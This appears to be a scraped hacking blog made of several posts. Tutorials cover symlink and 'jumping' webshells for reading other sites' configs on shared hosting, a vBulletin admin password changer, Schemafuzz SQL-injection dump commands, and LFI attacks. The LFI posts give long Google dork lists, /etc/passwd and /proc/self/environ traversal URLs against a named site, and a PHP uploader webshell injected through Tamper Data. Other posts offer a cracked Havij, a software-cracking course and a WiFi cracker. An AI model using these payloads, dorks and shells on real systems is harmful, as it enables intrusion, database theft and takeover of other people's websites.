Jumping / Bypassing Symlink Shell Linux Script PHP

Jumping / Bypassing Symlink Shell Linux Script PHP, This method is used to access folders / files on server based linux which user not permitted or forbidden, So by Bypassing symlink A user can  access files or folder either open configuration file in order to connect to the database. Now Time to share Symlink Shell Linux Script coded PHP. 

Jumping / Bypassing Symlink Shell Linux Script PHP

Download Jumping / Bypassing Symlink Shell Linux Script PHP

How to use Symlink bypass Shell script:

• Download the file sym.zip and Upload it into your shell
• Extract first command unzip sym.zip
• Run it Put symlink link ex : http://site.org/sym.php
• Click on User & Domain & Symlink
• Clink symlink and it will open directory of that user

Search Terms :

• symlink
• remove symlink
• symlink linux
• linux symlink
• create symlink
• windows symlink
• symlinks
• symlink windows
• unix symlink
• windows 7 symlink
• ubuntu symlink
• symlink ubuntu
• python symlink
• symlink unix
• perl symlink
• symlink directory
• linux create symlink
• delete symlink
• symlink windows 7
• create symlink linux
• chown symlink
• create a symlink
• make symlink
• samba follow symlinks
• git symlinks
• php symlink
• change symlink
• linux remove symlink
• windows symlinks
• git symlink
• python os.symlink
• apache symlinks
• svn symlink
• rsync symlinks
• windows 7 symlinks
• puppet symlink
• rsync symlink
• apache symlink
• ant symlink
• symlinks windows 7
• create sym link
• find broken symlinks
• apache follow symlinks
• find symlinks
• remove a symlink
• rm symlink
• creating symbolic links
• follow symlinks
• linux symlinks
• samba symlinks
• osx symlink
• creating a symlink
• symlink php
• symlinking
• rsync follow symlinks
• windows xp symlink
• os.symlink
• symlinks linux
• ntfs symlink
• symlink ln
• creating symlink
• os x symlink
• symlinker
• ln -s symlink
• linux symlink directory
• unix create symlink
• android symlink
• creating symlinks
• symlink in windows
• php database tutorial
• free proxy software
• symlinks in windows
• php software download
• php programming tutorial
• linux make symlink
• symlink osx
• man symlink
• python free download
• symlink folder
• download free proxy
• symlink syntax
• find follow symlinks
• symlink windows xp
• php database connection
• samba symlink
• tomcat follow symlinks
• create symbolic links
• symlinks windows
• ln symlink
• make a symlink
• free download proxy
• symlink attack
• proxy free download
• create symlinks
• create symlink windows
• shell script bash
• linux symlink example
• symlink android
• linux tutorials for beginners
• linux find symlinks
• symlink creator

Read More

Vbulletin Admin Password Changer Tool

Vbulletin Admin Changer Tool

This tool is named Vbulletin Admin password Changer Tool for Change administrator vbulletin password. You can upload this Vbulletin Admin Password Changer Tool from your shell.and run it.. Just fill the  name , username and password of database which configured in config.php. Password default of the admin is 121098. You can edit yourself the password that consist salt.

Let's Download / see source code Vbulletin Admin Password Changer Tool 

Here is Link for Vbulletin Admin Changer Tool

Search Term :

• password vbulletin
• vbulletin reset admin password
• password powered by vbulletin

Read More

Colection Jumping shell / Server Jumping Sites Domain

After you put the shell on a site such as using the way sql injection techniques, Local file inclusion or Remote File Inclusion, Then You want to read another config in it's server access with  Shell Jumping / PHP script which might be readable in / public / html. So after you get access to readable sites on the server you can read or jump to the config file and connect to mysql on localhost.

I will share PHP Script / Backdoor that includes Jumping Site Feature. This is aimed at jumping shell.

1. Server Jumping  Finder Version 3.0

Server Jumping  Finder Version 3.0

 
Download Server Jumping  Finder Version 3.0

Download Server Jumping  Finder Version 3.0

• Upload the file via Shell
• Extract file using command unzip jump.zip
• then run it in URL http://site.com/jump.php

 2. Simple Php Jumping Shell Script

Simple Shell Jumping

  
Download Simple Shell Jumping / Jumping Shell

Download Simple Shell Jumping

• Upload the file via Shell
• Extract file using command unzip jumping.zip
• then run it in URL http://site.com/jump.php 

 3. b3c4k Lompat V.2.0 - StealHealth

b3c4k Lompat V.2.0 - StealHealth

Download  b3c4k Lompat V.2.0 - StealHealth

Download  b3c4k Lompat V.2.0 - StealHealth

• Upload the file via Shell
• Run this shell in http://site.com/b3c4k.php
• Click On the Tab "Kamar Sebelah"

4.  b374k mini's claimed coded Newbie3viLc063s shell LOL ! (Credit: DevilsCafe)

b374k mini

 Download  b374k mini

 Download  b374k mini

• Upload the file via Shell
• Run this shell in http://site.com/b374k.php
• Click On the Tab "Readable"

After you found readable /public/html or read config file with Jumping shell / Shell jumping, Just put the path in view folder in your shell and Go!

Search Terms:

• jumping shell

Read More

[Tut] Run Schemafuzz.py Database Dump Tool

Now, Many tool hacking is easy to run Like Havij for database dump. But A person says that its tool for child 3 years old. Hahaha. Back to Schemafuzz, This tool quiet old named Schemafuzz that coded  by Darkc0de with phyton language. But Its still usefull to help to pentest website that buggy with SQL injection. Let's Download And See tutorial for command of Schemafuzz.py

Requirement :

1.Phyton  Download Here For windows

Here is preview 

Schemafuzz Priview

How it runs?

1.Finding range column 

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1" --findcol

2.Database name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dbs

 

3.Table and column name

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --schema -D databasename

4.Dump it

schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dump -D databasename -T tablename -C columnname,Columnname2

Here is Link to download Schemafuzz.py

Download Schemafuzz 

Mirror

 

Download Schemafuzz (From PasteBin)

Search Terms :

Download Schemafuzz.py

Read More

[Tut] LFI php://filter/read Source Code

Yeah..many Techniques that We can exploit from LFI Vulnerabilty.Ok before Next read..You could read my posting about Technique upload Shell Via Tamper data LFI Exploitation /proc/self/environ
No I tell you exploitation in LFI vulnerabilty using php://filter/read=convert.base64-encode/resource=

This exploit goals to read the source of file in that Vulnerable Website but The Source encoded With base64 code

http://target.com/index.php?page=php://filter/read=convert.base64-encode/resource=file.php

That is an example of the exploitation..U must decode that Source base64 code :D

OK..If You wanna To Watch My POC in video i have made..You are able to Download that
Thank you for watching ^^

http://www.ziddu.com/download/16299804/LFiAnOtherWAy.rar.html

OR untuk mirror

http://www.mediafire.com/?mz3y77fgkok2doql

Search Terms :

• local file inclusion
• remote file inclusion
• local file inclusion tutorial
• local file inclusion vulnerability
• lfi local file inclusion
• local file inclusion exploit
• local file include
• web server vulnerability
• vulnerability php
• vulnerability of web server
• web server attacks

Read More

[TUT] Cracking Software / Cracking lessons

Software Cracking

Cracking Lessons – learn how to crack software with detailed video lessons (Bonus Included)
Professional software crackers are ready to reveal their secrets!
Learn how to crack software with one’s own hands!
From: lena151
< We are the first one to offer the most detailed, interesting and entertaining interactive video tutorials on software cracking. Experienced crackers will demonstrate and comment each step of software cracking.
You will study a detailed, step by step lessons created by a real practicing cracker. You don’t need to be a PC guru and don’t even have to master any software programming languages. We will show you how to crack software with both the most simple and the most sophisticated protection systems.
br />Whats included in our Learning Course?
1 Theoretical Introduction
20-page PDF-introduction to cracking.

You’ll get answers to the following questions:
Who cracks software?
What types of protection exist nowadays?
What software is impossible to crack?
What tools are needed for successful cracking?

This information will be useful for you to get a better understanding of the cracking core.
2 36+ Interactive Video Tutorials

This is the valuable part of our training program. At the date, we have done 36 interactive video lessons, that will let you know all the ins and outs of software cracking. We will add new videos per our members’ requests!

Videos are 20-30 mins each. Every action, every click and every event is commented. We give an explanation of what we do and why we do it like that.

List of videos:
Windows cracking [ready to watch and learn!]:
Intro for noobs, asm basics, simple patching — 2 videos
Debugging, tracing, analyzing — 2 videos
Making keyfiles — 1 video
Different methods of patching — 4 videos
Finding serial numbers — 1 video
Removing “nag” screens — 1 video
Cracking Visual Basic software — 2 videos
Cracking Delphi software — 2 videos
Making a “self-keygen” — 1 video
Cracking using resources — 1 video
Introto packers and protectors — 1 video
Unpacking ASProtect, Armadillo, tElock — 5 videos
“Inline” patching — 2 videos;
Killing online servers check — 2 videos;
Creating loaders — 2 videos
Cracking tricks, anti-debugging, rebuilding PE — 3 videos
Creating a keygen — 1 video
…and more — total 36 videos on Windows cracking!

.NET cracking [in process, coming soon to members area]:
Patching .NET applications — 1 video
Making a keygen on .NET — 1 video

Mobile cracking [in process, coming soon to members area]:
Cracking Windows Mobile software — 2 videos
Cracking Symbian software — 1 video
Cracking iPhone/iPod software — 1 video

scripts crakcing [in process, coming soon to members area]:
Nulling a simple PHP script — 1 video
Nulling Zended and Ioncubed PHP scripts — 1 video
..and more, per our members’ requests!

Basically, you have a full cracking training course in front you, including everything starting from cracking basics to keygen creation.
3 Crackers’ Suite – 600+ cracking tools

This is, perhaps, the most useful part of our proposal. Specially for the Cracking Lessons project, we have gathered all necessary tools for software cracking and protection!

Whats included:
22 file analyzers, 51 debugging tools, 36 decompilers
31 disassembling tools, 47 tools for dongle cracking
40 exe-packers, 44 protectors, 50 exe-unpackers
26 password crackers, 21 crypto tools
39 monitors, 35 patch generators
around 100 programming tools
24 tools for mobile cracking and much much more!

Download Cracking lessons part1

Download Cracking lessons part2 

 Source : http://tuts4you.com

Search Terms:

• tutorial crack
• crack tutorial
• crack software tutorial
• wep crack tutorial
• crack wep tutorial
• software crack tutorial
• wpa crack tutorial
• backtrack wep crack tutorial
• photoshop crack tutorial
• crack program tutorial
• crack photoshop tutorial

Read More

Havij Pro version 1.5 Cracked

Havij 1.6 Pro Full Version Download - OK guys I found it from forum devilc0de that located In HttP://devilzc0de.org/forum/
Tq for the devilzc0de member to share This havij pro version 1.5. Cracked

Here is screeshot :

Havij 1.6 Pro Full Version Download Cracked

Below is The link You can download that Havij 1.5 Cracked

Download Link Below:

Havij 1.6 Pro Full Version Download

IF you get error tabctl32.ocx not regestered
Simple just download here
http://www.ocxdump.com/download-ocx-files_new.php/ocxfiles/T/TABCTL32.OCX/6.01.9782/download.html
and paste it in C:/windows/system32

OK happy inject ^^

Search terms:

• havij
• havij download
• download havij
• havij pro
• havij 1.14
• havij 1.14 pro
• havij full version
• havij cracked
• havij pro download
• havij sql
• havij scanner
• havij sql injection
• havij 1.13 pro
• havij pro version
• havij portable
• havij commercial version
• download havij 1.10
• havij tutorial
• havij sql download
• havij sql injection download
• havij tool download
• havij post
• havij download sql injection
• havij 1.13 download
• havij 15
• havij advanced sql injection tool
• free download havij sql injection
• havij advanced sql injection tool download
• download havij 1.13
• havij tool
• havij sql injection tool download
• havij sql injection tool
• havij 2012
• how to use havij sql-injection
• havij 1.15 pro patch
• sql injection tool havij
• havij 1.10 download
• havij new version

Read More

[Tut] Local File Inculusion / LFI (/proc/self/environ)

LFI (Local File Inclusion)

What is LFI or Local File Inclusion?
This Description from Wikipedia
is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
Example of Php Vulnerable script

<?php $file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}

So this script PHP could be injected like

http://example.com/index.php?file=contactus.php

OK Now i will show you POC exploited This vulnerablity The Way backdoored shell via Tamper data

1.First.you could search in google Vulnerable website.HEre Are The list of Dorks ive collected..

Dorks :

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=


LFI(Local File Inclusion)

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

2.OK after Get the Website,Check That Website
For example;

http://vanessasbodymall.com/index.php?page=products.php

Is that website could call /etc/passwd File ????
You could add an ../../ << To go to that Server Website Directory

http://vanessasbodymall.com/index.php?page=/etc/passwd

3.So if '/etc/passwd' could be Called So that Site Vulnerable With LFI.So How To plant WebShell/Backdoor? > You should check Wheather /proc/self/environ < Could be Called ,So The URI likes below

http://vanessasbodymall.com/index.php?page=../../../../../../../../proc/self/environ

4.Upload Sheel via tamper data
You Should download That firefox plugin..Here i Give U the link

https://addons.mozilla.org/en-us/firefox/downloads/file/79565/tamper_data-11.0.1-fx.xpi?src=addondetail&confirmed=1

Ok Next Step after installing the plugin

a.Restart Your browser Mozilla Firefox
b.Then Click "Tool" > "MenuBar" and klik "Tamper Data"
c.Click start tamper > lalu refresh page tersebut
d.So will be pop up > Click "Tamper"
e.Replace This Code or You could Replace anything php evil code

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

f.Yes Right..If You're Success plant That Php Script..This Script will be located at http://vanessasbodymall.com/Yourshellname.php

Search Terms :

• local file inclusion
• remote file inclusion
• local file inclusion tutorial
• local file inclusion vulnerability
• lfi local file inclusion
• local file inclusion exploit
• local file include
• web server vulnerability
• vulnerability php
• vulnerability of web server
• web server attacks

Read More

FERN WIFI CRACKER New Version (wep and wpa Cracker tool)

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks

Operating System Supported

The Software runs on any Linux mahine with the programs prerequisites, But the program has been tested on the following Linux based Operating Systems: 

• Ubuntu KDE/GNOME
• BackTrack Linux
• BackBox Linux

Prerequisites

The Program requires the following to run properly:

The following dependencies can be installed using the Debian package installer command on debian based systems using "apt-get install program" or otherwise downloaded and installed manually

• Aircrack-NG
• Python-Scapy
• Python Qt4
• Python
• Subversion
• Xterm
• Reaver (for WPS Attacks)
• Macchanger
• Features

Fern Wifi Cracker currently supports the following features:

• WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
• WPA/WPA2 Cracking with Dictionary or WPS based attacks
• Automatic saving of key in database on successful crack
• Automatic Access Point Attack System
• Session Hijacking (Passive and Ethernet Modes)
• Access Point MAC Address Geo Location Tracking
• Internal MITM Engine
• Update Support

Installation

Installation on Debian Package supported systems:

root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb

The Source Code for the program can be fetched using the following command on terminal

root@host:~# svn checkout http://fern-wifi-cracker.googlecode.com/svn/Fern-Wifi-Cracker/

This is Screenshot and description From the author

Fern wifi Cracker

Fern Wifi Cracker

Its Linux based, looks better on Gnome than KDE desktop interface, if

your using KDE the executable is in the directory /usr/local/bin/Fern-Wifi-Cracker , im giving this due to the fact that the debian installer was created for Gnome</

,so the shortcut will be created for gnome afer generic installation "dpkg -i Fern-Wifi-Cracker_1.0_all.deb" ,for KDE users, you may have to create a shortcut yourself
after the installation.

Just created the google code page for hosting it..... So please bear with the fact that i dont have a wiki help page yet

Download ( From Google Code )

DEVELOPER : Saviour Emmauel Ekiko

Source

http://www.backtrack-linux.org/forums/experts-forum/34517-new-fern-wifi-cracker.html
http://code.google.com/p/fern-wifi-cracker/

Search Terms:

• Fern wifi cracker

Read More